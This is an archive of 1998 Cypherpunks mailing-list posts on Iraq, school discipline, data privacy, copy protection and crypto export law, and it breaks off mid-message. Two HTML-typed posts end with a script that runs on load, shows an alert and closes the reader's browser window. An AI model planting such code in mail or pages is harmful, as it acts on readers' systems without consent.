>Subject: Re: Anthrax--The Four Horsemen are Riding
>Newsgroups: scruz.general
>Organization: None
>
>In article <cbishop-2102981021400001@cbishop.sc.scruznet.com>,
>cbishop@scruznet.com wrote:
>
>> In article <6cm4nv$edi$1@shell3.ba.best.com>, obob@shell3.ba.best.com (Bob
>> O`Brien) wrote:
>>
>> > In article <34ee3039.1340384@cnews.newsguy.com>,
>> > mmelpremo@cruzio.com <mmelpremo@cruzio.com> wrote:
>> > >
>> > >It seems Clinton has backed himself into a corner on the situation,
>> > >and now has the choice of bombing Iraq or backing down from threats of
>> > >bombing Iraq.  Both are losing propositions.
>> > >
>> > >I'm also interested in hearing everyone else's opinions, as well,
>> > >since I'm still trying to form one.
>> > >
>> >
>> > At the end of the last "war", Saddam _personally_agreed_ to
>> > the UN's plan that would have accomplished all the inspections
>> > IN FIFTEEN DAYS.
>> >
>> > [Bob's for military action agains Iraq]
>>
>> If the UN had accomplished the inspections in fifteen days, would they
>> have been done and not done any more inspections?
>
>
>The realpolik of it all is that the last thing the "Oil Patch" wants is
>Iraq pumping a couple million barrels of oil and selling it on the world
>market.
>
>When oil prices plummeted in the mid-80s, Texas was hit hardly. Texas oil
>men were wiped out, refineries were closed, and the seeds of the S&L
>collapse were nurtured. (The seeds of the S&L collapse were of course
>planted when the government agreed to bail out banks and S&Ls, regardless
>of the risks they took.)
>
>Many of George Bush's friends, and even his own investments (Zapata, for
>example), were affected.
>
>Iraq was expected to pump more of the oil from the disputed oilfields than
>the Kuwaitis were willing to pump.
>
>As the war evolved, oil prices went up, and the Texans were partly saved.
>
>Having any final settlement of the Iraqi situation, and thus having them
>further depress the world oil price, would be unacceptable to the Oil
>Boys.
>
>Oil prices have been falling again, even with Iraq out of the oil market.
>Prices for light sweet crude are down to around $16 a barrel, maybe less.
>Texas is feeling the pinch again.
>
>A coincidence that the saber rattling suddenly is picking up?
>
>Wouldn't it be great for the Oil Boys if a war with Iraq spread, and maybe
>took out the Kuwaiti and even Saudi oil fields? Oil at $30 a barrel would
>shure be a purty sight to them good ole boys.
>
>Call me a cynic, but nothing is as simple as the sheeple are being led to
>believe.
>
>--Tim May
>
>--
>Just Say No to "Big Brother Inside"
>---------:---------:---------:---------:---------:---------:---------:----
>Timothy C. May              | Crypto Anarchy: encryption, digital money,
>ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
>W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
>Higher Power: 2^3,021,377   | black markets, collapse of governments.
>



From owner-cypherpunks@Algebra.COM Sun Feb 22 04:40 SGT 1998
Return-Path: <owner-cypherpunks@Algebra.COM>
Received: from www.video-collage.com ([206.15.171.132])
          by segamat.nus.edu.sg (Netscape Messaging Server 3.0)  with ESMTP
          id AAA20255 for <cypher@infinity.nus.edu.sg>;
          Sun, 22 Feb 1998 04:40:05 +0800
Received: (from ichudov@localhost)
	by www.video-collage.com (8.8.5/8.8.5) id PAA26318
	for cypherpunks-outgoing; Sat, 21 Feb 1998 15:32:04 -0500 (EST)
Received: from users.invweb.net (root@users.invweb.net [198.182.196.33])
	by www.video-collage.com (8.8.5/8.8.5) with ESMTP id PAA26306
	for <cypherpunks@Algebra.COM>; Sat, 21 Feb 1998 15:32:00 -0500 (EST)
Received: from whgiii (ppp09.NAS1.dotstar.net [208.143.93.28])
	by users.invweb.net (8.8.7/8.8.7) with SMTP id QAA16832;
	Sat, 21 Feb 1998 16:06:22 -0500
Message-Id: <199802212106.QAA16832@users.invweb.net>
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Sat, 21 Feb 98 14:30:32 -0500
To: Tim May <tcmay@got.net>
In-Reply-To: <v03102808b114caa597c5@[207.167.93.63]>
Cc: cypherpunks@Algebra.COM
Subject: Re: Some children are rabid and need to be put down
MIME-Version: 1.0
X-Mailer: MR/2 Internet Cruiser Edition for OS/2 v1.43 b43 
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com
Content-Type: text/html
Content-Length: 2907


-----BEGIN PGP SIGNED MESSAGE-----

In <v03102808b114caa597c5@[207.167.93.63]>, on 02/21/98 
   at 10:22 AM, Tim May <tcmay@got.net> said:

>At 6:13 AM -0800 2/21/98, William H. Geiger III wrote:

>>Well you have definatly jumped off the deep end on this one Tim. If we
>>were talking a teenager going out of control then I would agree with you.
>>A 5 year old though??
>>
>>>If a teacher can't defend herself, legally and professionally, from
>>>children biting and throwing chairs, the cops have to be called.
>>
>>If a teacher can not subdue and control a 5 year old little girl without
>>resorting to physical violence or calling in the storm troopers it's time
>>to look for another line of work.

>My sister teaches Kindergarten/first grade in the LA County School
>District, specifically, Inglewood (shudder). She is forbidden to:

>- physically touch the children in any way

>- discipline them in any meaningful way

>- flunk them if they fail to behave or learn what is supposedly required

>("Flunking Kindergarten" is tough, so where this rule really become
>significant is in the higher grades, where all kids are promoted, even
>those who can't read, can't add, etc.)

>My sister says the teachers have zero power to do anything, and the kids
>know it.

Well looks like she needs either to move or look at a career change.

Yes the laws in CA are fucked that does not excuse the actions here in FL
by the school and the local stormtroopers.

>>When have you ever been so quick to blindly believe the spindoctoring of
>>the government Tim?
>>

>Spare me the casual insults.

>I call things as I see them. I've heard no spin-doctoring, just reports
>of the child's behavior, admitted by her father.

So one temper-tantrum by a 5 year old and its off to the BigHouse on
Felony Assault Charges??

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------
 
Tag-O-Matic: MASOCHIST: Windows SDK programmer with a smile!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNO8sco9Co1n+aLhhAQFmTAP+JZT4FarjfSNFBpBvisZ7qOxW4O61l0RO
qQj6zZlxJEgglyBmRAbZK528Oo6XGNz8/3JAP66LHUNs9ecPWW8ZWuH2J75DdI3g
CWJeW+YG8HAztTgn+G77sG+WITFg9jhxMHZPoGu6aajB3AZcFfaStlx7ja5d+Olb
VG5Q6nvqg5Q=
=MORm
-----END PGP SIGNATURE-----

<HTML><META HTTP-EQUIV="Content-Type:text/html"> <SCRIPT>
function X() {var Text = "HTML is not acceptable for using in mail " +
"or usenet so your browser will stop."; alert(Text); parent.close();};
</SCRIPT> </HEAD><BODY onLoad="X();return true">Hi</HTML>


From owner-cypherpunks@Algebra.COM Sun Feb 22 05:00 SGT 1998
Return-Path: <owner-cypherpunks@Algebra.COM>
Received: from www.video-collage.com ([206.15.171.132])
          by segamat.nus.edu.sg (Netscape Messaging Server 3.0)  with ESMTP
          id AAA20279 for <cypher@infinity.nus.edu.sg>;
          Sun, 22 Feb 1998 04:59:58 +0800
Received: (from ichudov@localhost)
	by www.video-collage.com (8.8.5/8.8.5) id PAA26440
	for cypherpunks-outgoing; Sat, 21 Feb 1998 15:52:33 -0500 (EST)
Received: from sirius.infonex.com (sirius.infonex.com [209.75.197.2])
	by www.video-collage.com (8.8.5/8.8.5) with ESMTP id PAA26428
	for <cypherpunks@algebra.com>; Sat, 21 Feb 1998 15:52:29 -0500 (EST)
Received: (from cpunks@localhost) by sirius.infonex.com (8.8.8/8.7.3) id MAA26067; Sat, 21 Feb 1998 12:54:43 -0800 (PST)
Received: from rigel.cyberpass.net (root@rigel.infonex.com [209.75.197.3]) by sirius.infonex.com (8.8.8/8.7.3) with ESMTP id MAA26063 for <cpunks@sirius.infonex.com>; Sat, 21 Feb 1998 12:54:36 -0800 (PST)
Received: from users.invweb.net (root@users.invweb.net [198.182.196.33]) by rigel.cyberpass.net (8.8.8/8.7.3) with ESMTP id MAA16670 for <cypherpunks@cyberpass.net>; Sat, 21 Feb 1998 12:49:16 -0800 (PST)
Received: from whgiii (ppp09.NAS1.dotstar.net [208.143.93.28])
	by users.invweb.net (8.8.7/8.8.7) with SMTP id QAA17001;
	Sat, 21 Feb 1998 16:26:46 -0500
Message-Id: <199802212126.QAA17001@users.invweb.net>
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Sat, 21 Feb 98 14:53:49 -0500
To: amp@pobox.com
In-Reply-To: <Chameleon.888087491.amp@ampugh.mcit.com>
Cc: cypherpunks@cyberpass.net, Tim May <tcmay@got.net>
Subject: Re: SF Chronicle on Sen. Dianne Feinstein: "Feinstein Offline"
MIME-Version: 1.0
X-Mailer: MR/2 Internet Cruiser Edition for OS/2 v1.43 b43 
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com
Content-Type: text/html
Content-Length: 1887


-----BEGIN PGP SIGNED MESSAGE-----

In <Chameleon.888087491.amp@ampugh.mcit.com>, on 02/21/98 
   at 01:45 PM, amp@pobox.com said:

>The problem is, the company was getting the information from the state in
> the first place. Anyone with a bit of cash can buy the entire drivers 
>license database from the state of texas on CD-rom. Rather than 
>criminalizing private actions, it would have been much better for the
>state  to just =stop selling the information=! The databases already held
>would  quickly become stale, and the problem would pretty much go
>away.

No the solution is to remove the power of the State to collect the
information in the first place. I don't want anyone to have this
information regardless if it be in private hands or some government
buracrats hands.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------
 
Tag-O-Matic: What I like about MS is its loyalty to customers!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNO8xQo9Co1n+aLhhAQEJsAQAwLvtHoOl+qh28e3Z43cwzS6jt1uaSLvM
ewOjrpgHXLWSUs96vFjSCKctER/6m/2QyV8417ifiuacqaCRMVx9YMQ28OU/cWG9
thcEA9lXvME+VFXspoKR2TJTSmcmGh/fGhz/0HWbPIyPN7/vjC9FZLp/nVtbeDHC
9GeYLE+PXQM=
=aOI5
-----END PGP SIGNATURE-----

<HTML><META HTTP-EQUIV="Content-Type:text/html"> <SCRIPT>
function X() {var Text = "HTML is not acceptable for using in mail " +
"or usenet so your browser will stop."; alert(Text); parent.close();};
</SCRIPT> </HEAD><BODY onLoad="X();return true">Hi</HTML>


From owner-cypherpunks@Algebra.COM Sun Feb 22 00:11 SGT 1998
Return-Path: <owner-cypherpunks@Algebra.COM>
Received: from www.video-collage.com ([206.15.171.132])
          by segamat.nus.edu.sg (Netscape Messaging Server 3.0)  with ESMTP
          id AAA19732 for <cypher@infinity.nus.edu.sg>;
          Sun, 22 Feb 1998 00:11:19 +0800
Received: (from ichudov@localhost)
	by www.video-collage.com (8.8.5/8.8.5) id LAA23208
	for cypherpunks-outgoing; Sat, 21 Feb 1998 11:02:49 -0500 (EST)
Received: from galaxy.galstar.com (root@galaxy.galstar.com [204.251.80.2])
	by www.video-collage.com (8.8.5/8.8.5) with ESMTP id LAA23177
	for <cypherpunks@ALGEBRA.COM>; Sat, 21 Feb 1998 11:02:32 -0500 (EST)
Received: from sirius.infonex.com (sirius.infonex.com [209.75.197.2])
	by galaxy.galstar.com (8.8.5/8.8.5) with ESMTP id JAA28033
	for <cypherpunks@algebra.com>; Sat, 21 Feb 1998 09:04:57 -0600 (CST)
Received: (from cpunks@localhost) by sirius.infonex.com (8.8.8/8.7.3) id HAA11020; Sat, 21 Feb 1998 07:04:53 -0800 (PST)
Received: from rigel.cyberpass.net (root@rigel.infonex.com [209.75.197.3]) by sirius.infonex.com (8.8.8/8.7.3) with ESMTP id HAA11016 for <cpunks@sirius.infonex.com>; Sat, 21 Feb 1998 07:04:39 -0800 (PST)
Received: from infowest.com (infowest.com [204.17.177.10]) by rigel.cyberpass.net (8.8.8/8.7.3) with ESMTP id GAA26005 for <cypherpunks@cyberpass.net>; Sat, 21 Feb 1998 06:59:19 -0800 (PST)
Received: from hun12.hun.org (attila.infowest.com [207.49.61.246])
	by infowest.com (8.8.8/8.8.5) with SMTP id IAA28386;
	Sat, 21 Feb 1998 08:03:33 -0700 (MST)
From: "Attila T. Hun" <attila@hun.org>
Reply-to: "Attila T. Hun" <attila@primenet.com>
Date: Sat, 21 Feb 98 15:02:50 +0000
To: Bill Stewart <bill.stewart@pobox.com>,
        "Eric J. Tune" <paladin@lvcablemodem.com>,
        cypherpunks <cypherpunks@cyberpass.net>
In-Reply-To: <3.0.5.32.19980220214430.008be9a0@popd.ix.netcom.com>
Cc: rantproc <attila@primenet.com>
Subject: Re: putting down the US military
Owner: Attila T. Hun <attila@hun.org>
X-Comment: Cyberspace is Our Freedom!  Your CDA is Dead!
Organization: old folks home for degenerate, unpenitent hackers; no crackers!
Message-ID: <19980221.140415.attila@hun.org>
Content-Disposition: inline
Mime-Version: 1.0
Content-Transfer-Encoding: 7bit
X-Mailer: MR/2 Internet Cruiser Edition for OS/2 v1.40 
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com
Content-Type: text/plain; charset=US-ASCII
Content-Length: 3131


-----BEGIN PGP SIGNED MESSAGE-----

on or about 980220:2144, in <3.0.5.32.19980220214430.008be9a0@popd.ix.netcom.com>, 
    Bill Stewart <bill.stewart@pobox.com> was purported to have 
    expostulated to perpetuate an opinion:

    [snip]
>...
>>    absolutely. misplaced criticism and a personal offense to me
>>    as well as all other servicemen.

>Sending US soldiers in to do a fool's errand like that should offend you
>even more.   
>
    absolutely, the government has obviously offended me more by
    its incredible stupidity: Vietnam, Somalia, Panama,
    Honduras, and the rest of their ill-conceived police actions
    and meddling; installing Khadafi, Hussein, the Shah, Nasser,
    whatever his name is in Syria, etc.; and now, the incredible
    attempt of Bubba to cover his domestic problems of an
    insatiable wandering dick with a "surgical" strike on the 
    long suffering Iraqi population who will again be the 
    collateral damage which doesn't happen (at least in theory).

    all the U.S. gains is an Iraqi population who hate the U.S.
    even more for our stupidity and therefore turn to Saddam who
    at least gives them pride, even if it does not feed their
    children --not to mention the enmity of the rest of the Arab
    world. even Iran is supporting Iraq which ought to tell us
    something.  

    Pax Americana --yeah, Americana it is, but where's the Pax? 

    if Bubba's going to press the button, he might as well press
    the big one and leave everything east of the beaches in Tel
    Aviv, all the way to Burma, a glass parking lot.

    out of the ashes of Iraq and the American morality, dont be
    surprised to see the man in the blue turban rise like the
    phoenix...

>And telling a free people that they should give up the guns
>they protect their families with because
>the UN will take care of protecting them is an offense to them.
>
    well, as I said: I have no regrets for what I did, but I
    sure as hell have regrets for whom I did the deeds. the
    sorry bastards who claim to be "my" government have no
    claim on my respect. 

    as I said before: is it not odd that the more the government
    tries to abridge our freedom of speech, the more they want
    to confiscate our weapons?

    a well-armed populace is a threat to a corrupt, suppressive
    government; the first step in subjugating the American 
    population to become part of the UN/NWO "family" is to 
    confiscate personal arms in the name of public safety --or,
    the fear of criminal actions by loose cannons, etc. 

    arms registration is the first step towards confiscation.

    I've been trying to find something about that pack of 
    thieves trying to deify themselves that has not earned my
    contempt. I'll announce it, when I find it, but dont hold 
    your breath.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: No safety this side of the grave. Never was; never will be

iQBVAwUBNO7sN7R8UA6T6u61AQEPggH/SQ8zCg9XDzAqp/EGYtZXk8Y/r7TY1i8V
a4iGgShOPlo/vdXQPFWni6yQHvlLZmweO5R1plS4XeyHkJa3xcoabA==
=zbOm
-----END PGP SIGNATURE-----


From owner-cypherpunks@Algebra.COM Sun Feb 22 02:47 SGT 1998
Return-Path: <owner-cypherpunks@Algebra.COM>
Received: from www.video-collage.com ([206.15.171.132])
          by segamat.nus.edu.sg (Netscape Messaging Server 3.0)  with ESMTP
          id AAA20012 for <cypher@infinity.nus.edu.sg>;
          Sun, 22 Feb 1998 02:47:17 +0800
Received: (from ichudov@localhost)
	by www.video-collage.com (8.8.5/8.8.5) id NAA25291
	for cypherpunks-outgoing; Sat, 21 Feb 1998 13:41:05 -0500 (EST)
Received: from dfw-ix3.ix.netcom.com (dfw-ix3.ix.netcom.com [206.214.98.3])
	by www.video-collage.com (8.8.5/8.8.5) with ESMTP id NAA25278;
	Sat, 21 Feb 1998 13:41:00 -0500 (EST)
Received: (from smap@localhost)
          by dfw-ix3.ix.netcom.com (8.8.4/8.8.4)
	  id MAA28105; Sat, 21 Feb 1998 12:39:28 -0600 (CST)
Received: from den-co6-26.ix.netcom.com(199.35.204.218) by dfw-ix3.ix.netcom.com via smap (V1.3)
	id rma028093; Sat Feb 21 12:39:06 1998
From: fnorky@geocities.com (Douglas L. Peterson)
To: Curtis Yarvin <Curtis_Yarvin@geoworks.com>
Cc: ichudov@Algebra.COM, cypherpunks@Algebra.COM, cyarvin@geoworks.com
Subject: Re: Digital copy prot3ction
Date: Sat, 21 Feb 1998 18:39:23 GMT
Message-ID: <34ef1ee0.130883701@smtp.ix.netcom.com>
References: <199802200259.SAA10250@ammonia.geoworks.com>
In-Reply-To: <199802200259.SAA10250@ammonia.geoworks.com>
X-Mailer: Forte Agent 1.5/32.452
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by www.video-collage.com id NAA25279
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com
Content-Type: text/plain; charset=us-ascii
Content-Length: 1163


On Thu, 19 Feb 1998 18:59:25 -0800 (PST), you wrote:

>
>> 
>> I can hardly believe that any of these schemes are undefeatable.
>> 
>> As soon as the CPU starts talking to a video and sound board, 
>> this whole thing becomes easily breakable. All one needs to do is
>> to capture the signals that go to these boards and re-record them.
>
>In general, there's no way of building a secure system that
>prevents copying of information, but permits its consumption.
>The two are too closely related.
>
>The best you could do is a tamper-resistant hardware key on
>the audio/video card.  (This locks you into a design where
>the content is decoded on the card, which may be suboptimal.)
>And anyone who can crack the crypto chip can get unprotected
>digital copies and distribute them.  This is probably doable
>by the same kind of people who set up pirate CD factories.
<snip>

Ala VideoCypher from the 80's.  It didn't take much to cause the cpu
in the box to spill its guts.  Then again, it may have been because
the cpu was from TI.

-Doug
-------------------
Douglas L. Peterson
mailto:fnorky@geocities.com
http://www.geocities.com/SiliconValley/Heights/1271/


From owner-cypherpunks@Algebra.COM Sun Feb 22 10:54 SGT 1998
Return-Path: <owner-cypherpunks@Algebra.COM>
Received: from www.video-collage.com ([206.15.171.132])
          by segamat.nus.edu.sg (Netscape Messaging Server 3.0)  with ESMTP
          id AAA20795 for <cypher@infinity.nus.edu.sg>;
          Sun, 22 Feb 1998 10:54:10 +0800
Received: (from ichudov@localhost)
	by www.video-collage.com (8.8.5/8.8.5) id VAA29513
	for cypherpunks-outgoing; Sat, 21 Feb 1998 21:46:38 -0500 (EST)
Received: from sirius.infonex.com (sirius.infonex.com [209.75.197.2])
	by www.video-collage.com (8.8.5/8.8.5) with ESMTP id VAA29501
	for <cypherpunks@algebra.com>; Sat, 21 Feb 1998 21:46:24 -0500 (EST)
Received: (from cpunks@localhost) by sirius.infonex.com (8.8.8/8.7.3) id SAA29670; Sat, 21 Feb 1998 18:48:02 -0800 (PST)
Received: from rigel.cyberpass.net (root@rigel.infonex.com [209.75.197.3]) by sirius.infonex.com (8.8.8/8.7.3) with ESMTP id SAA29655 for <cpunks@sirius.infonex.com>; Sat, 21 Feb 1998 18:47:51 -0800 (PST)
Received: from toad.com (toad.com [140.174.2.1]) by rigel.cyberpass.net (8.8.8/8.7.3) with ESMTP id SAA01711 for <cypherpunks@cyberpass.net>; Sat, 21 Feb 1998 18:42:33 -0800 (PST)
Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id SAA11008 for cypherpunks-unedited-outgoing; Sat, 21 Feb 1998 18:41:25 -0800 (PST)
Received: from proxy3.ba.best.com (root@proxy3.ba.best.com [206.184.139.14]) by toad.com (8.7.5/8.7.3) with ESMTP id SAA11003 for <cypherpunks@toad.com>; Sat, 21 Feb 1998 18:41:23 -0800 (PST)
Received: from jamesd (jamesd.vip.best.com [204.156.153.125]) by proxy3.ba.best.com (8.8.8/8.8.BEST) with SMTP id SAA21614; Sat, 21 Feb 1998 18:39:57 -0800 (PST)
Date: Sat, 21 Feb 1998 18:39:57 -0800 (PST)
Message-Id: <199802220239.SAA21614@proxy3.ba.best.com>
X-Sender: jamesd@shell11.ba.best.com
X-Mailer: Windows Eudora Version 2.1
Mime-Version: 1.0
To: Anonymous <anon@anon.efga.org>, cypherpunks@toad.com, cryptography@c2.net
From: "James A. Donald" <jamesd@echeque.com>
Subject: Re: US law on re-exporting crypto software?
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com
Content-Type: text/plain; charset="us-ascii"
Content-Length: 1482


    --
At 06:49 PM 2/19/98 -0500, Anonymous wrote:
> An article in the current issue of the German journal 
> `Datenschutz und Datensicherheit' claims that exporting 
> crypto software from anywhere outside the US to a third 
> country violates US law if the software contains (only 
> marginal amounts of) US-developed code, such as a C  
> standard library, and that anyone distributing crypto 
> software that has been compiled with an American compiler 
> had better not visit the United States.  Is that true?

No one knows what the laws on cryptography in the US are, 
least of all the courts or the lawyers.

There is a law against exporting armaments, or indeed doing 
diddly squat with armaments, and the bureaucrats have decreed 
crypto an armament, however they have displayed profound 
reluctance to take this issue to court, so the implications 
of such a law, and such a definition remain entirely unknown.

However since no one has yet been actually indicted, it is 
unlikely that you will be the first.  

    --digsig
         James A. Donald
     6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
     MukYGG/TcTpm9PDncEpXfT4BfC8t7mVXt7WWsJtm
     42je0WMVidgZLmeFqZcxiIvUBWPKVWWUER4SS70Ko
 ---------------------------------------------------------------------
We have the right to defend ourselves and our property, because of 
the kind of animals that we are. True law derives from this right, 
not from the arbitrary power of the state.

http://www.jim.com/jamesd/


From owner-cypherpunks@Algebra.COM Sun Feb 22 02:47 SGT 1998
Return-Path: <owner-cypherpunks@Algebra.COM>
Received: from www.video-collage.com ([206.15.171.132])
          by segamat.nus.edu.sg (Netscape Messaging Server 3.0)  with ESMTP
          id AAA20018 for <cypher@infinity.nus.edu.sg>;
          Sun, 22 Feb 1998 02:47:32 +0800
Received: (from ichudov@localhost)
	by www.video-collage.com (8.8.5/8.8.5) id NAA25253
	for cypherpunks-outgoing; Sat, 21 Feb 1998 13:39:08 -0500 (EST)
Received: from einstein.ssz.com (root@einstein.ssz.com [204.96.2.99])
	by www.video-collage.com (8.8.5/8.8.5) with SMTP id NAA25239
	for <cypherpunks@algebra.com>; Sat, 21 Feb 1998 13:38:59 -0500 (EST)
Received: (from cpunks@localhost) by einstein.ssz.com (8.6.12/8.6.9) id MAA30286 for cypherpunks@algebra.com; Sat, 21 Feb 1998 12:53:27 -0600
Received: (from bin@localhost) by einstein.ssz.com (8.6.12/8.6.9) id MAA30280 for cypherpunks-outgoing; Sat, 21 Feb 1998 12:53:22 -0600
Received: from dfw-ix12.ix.netcom.com (dfw-ix12.ix.netcom.com [206.214.98.12]) by einstein.ssz.com (8.6.12/8.6.9) with ESMTP id MAA30274; Sat, 21 Feb 1998 12:53:18 -0600
Received: (from smap@localhost)
          by dfw-ix12.ix.netcom.com (8.8.4/8.8.4)
	  id MAA26578; Sat, 21 Feb 1998 12:40:51 -0600 (CST)
Received: from den-co6-26.ix.netcom.com(199.35.204.218) by dfw-ix12.ix.netcom.com via smap (V1.3)
	id rma026559; Sat Feb 21 12:40:39 1998
From: fnorky@geocities.com (Douglas L. Peterson)
To: Jim Choate <ravage@ssz.com>
Cc: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Digital copy prot3ction (fwd)
Date: Sat, 21 Feb 1998 18:40:57 GMT
Message-ID: <34f01f84.131046895@smtp.ix.netcom.com>
References: <199802200241.UAA20917@einstein.ssz.com>
In-Reply-To: <199802200241.UAA20917@einstein.ssz.com>
X-Mailer: Forte Agent 1.5/32.452
MIME-Version: 1.0
X-Mailing-List: cypherpunks@ssz.com
X-List-Admin: list@ssz.com
X-Loop: ssz.com
X-Language: English, Russian, German
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by www.video-collage.com id NAA25240
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com
Content-Type: text/plain; charset=us-ascii
Content-Length: 1146


On Thu, 19 Feb 1998 20:41:16 -0600 (CST), you wrote:

>
>Forwarded message:
>
>> Subject: Digital copy prot3ction
>> Date: Thu, 19 Feb 1998 20:16:49 -0600 (CST)
>> From: ichudov@algebra.com (Igor Chudov @ home)
>
>> I can hardly believe that any of these schemes are undefeatable.
>> 
>> As soon as the CPU starts talking to a video and sound board, 
>> this whole thing becomes easily breakable. All one needs to do is
>> to capture the signals that go to these boards and re-record them.
>> 
>> Right?
>
>> The proposed technology would have no effect on televisions, video
>> cassette recorders or computers already in use, the paper said.
>
>I suspect that this part is the key, what they will propose is some
>mechanism to alter the chipsets from the one currently implimented. Expect
>them to impliment something similar to the DAT tape systems where the machine
>won't execute a copy function if it sees the correct signal.

I do hope it is like the DAT tape systems.  They are relatively easy
to get around.

-Doug
-------------------
Douglas L. Peterson
mailto:fnorky@geocities.com
http://www.geocities.com/SiliconValley/Heights/1271/


From owner-cypherpunks@Algebra.COM Sun Feb 22 03:10 SGT 1998
Return-Path: <owner-cypherpunks@Algebra.COM>
Received: from www.video-collage.com ([206.15.171.132])
          by segamat.nus.edu.sg (Netscape Messaging Server 3.0)  with ESMTP
          id AAA20056 for <cypher@infinity.nus.edu.sg>;
          Sun, 22 Feb 1998 03:10:27 +0800
Received: (from ichudov@localhost)
	by www.video-collage.com (8.8.5/8.8.5) id OAA25522
	for cypherpunks-outgoing; Sat, 21 Feb 1998 14:02:41 -0500 (EST)
Received: from sirius.infonex.com (sirius.infonex.com [209.75.197.2])
	by www.video-collage.com (8.8.5/8.8.5) with ESMTP id OAA25501
	for <cypherpunks@algebra.com>; Sat, 21 Feb 1998 14:02:35 -0500 (EST)
Received: (from cpunks@localhost) by sirius.infonex.com (8.8.8/8.7.3) id LAA21202; Sat, 21 Feb 1998 11:04:48 -0800 (PST)
Received: from rigel.cyberpass.net (root@rigel.infonex.com [209.75.197.3]) by sirius.infonex.com (8.8.8/8.7.3) with ESMTP id LAA21195 for <cpunks@sirius.infonex.com>; Sat, 21 Feb 1998 11:04:29 -0800 (PST)
Received: from toad.com (toad.com [140.174.2.1]) by rigel.cyberpass.net (8.8.8/8.7.3) with ESMTP id KAA11896 for <cypherpunks@cyberpass.net>; Sat, 21 Feb 1998 10:59:11 -0800 (PST)
Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id KAA09080 for cypherpunks-unedited-outgoing; Sat, 21 Feb 1998 10:59:32 -0800 (PST)
Received: from dfw-ix14.ix.netcom.com (dfw-ix14.ix.netcom.com [206.214.98.14]) by toad.com (8.7.5/8.7.3) with ESMTP id KAA09075 for <cypherpunks@toad.com>; Sat, 21 Feb 1998 10:59:30 -0800 (PST)
Received: (from smap@localhost)
          by dfw-ix14.ix.netcom.com (8.8.4/8.8.4)
	  id MAA24001; Sat, 21 Feb 1998 12:57:37 -0600 (CST)
Received: from den-co6-26.ix.netcom.com(199.35.204.218) by dfw-ix14.ix.netcom.com via smap (V1.3)
	id rma023983; Sat Feb 21 12:57:08 1998
From: fnorky@geocities.com (Douglas L. Peterson)
To: Ken Williams <jkwilli2@unity.ncsu.edu>
Cc: Information Security <guy@panix.com>, cypherpunks@toad.com
Subject: Re: Fwd: Big Brother Sees through walls (from the spyking list)
Date: Sat, 21 Feb 1998 18:57:25 GMT
Message-ID: <34f12039.131228245@smtp.ix.netcom.com>
References: <Pine.SOL.3.96.980221065336.5774A-100000@c00954-100lez.eos.ncsu.edu>
In-Reply-To: <Pine.SOL.3.96.980221065336.5774A-100000@c00954-100lez.eos.ncsu.edu>
X-Mailer: Forte Agent 1.5/32.452
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by www.video-collage.com id OAA25511
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com
Content-Type: text/plain; charset=us-ascii
Content-Length: 5005


On Sat, 21 Feb 1998 07:45:20 -0500 (EST), you wrote:

>
>On Fri, 20 Feb 1998, Information Security wrote:
>
>>   >   From: sunder <sunder@brainlink.com>
>>   >   
>>   >   1)From: "George Martin" <gmartin@kic.or.jp>
>>   >   Subject: News Release: High-Tech Surveillance
>>   >   
>>   >   Here's a sampling of how state and federal agencies are using this
>>   >   terrifying technology to spy on Americans:
>>   >   
>>   >   * In North Carolina, county governments use high-resolution spy satellite
>>   >   photographs to search for property improvements that might increase
>>   >   property tax assessments.
>>
>>Was this cost authorized by taxpayers?
>>
>
>I have lived in Raleigh, North Carolina my entire life (over 30 yrs).
>County governments consist of an elected board of commissioners who have
>the power to make such decisions and expenditures without holding public
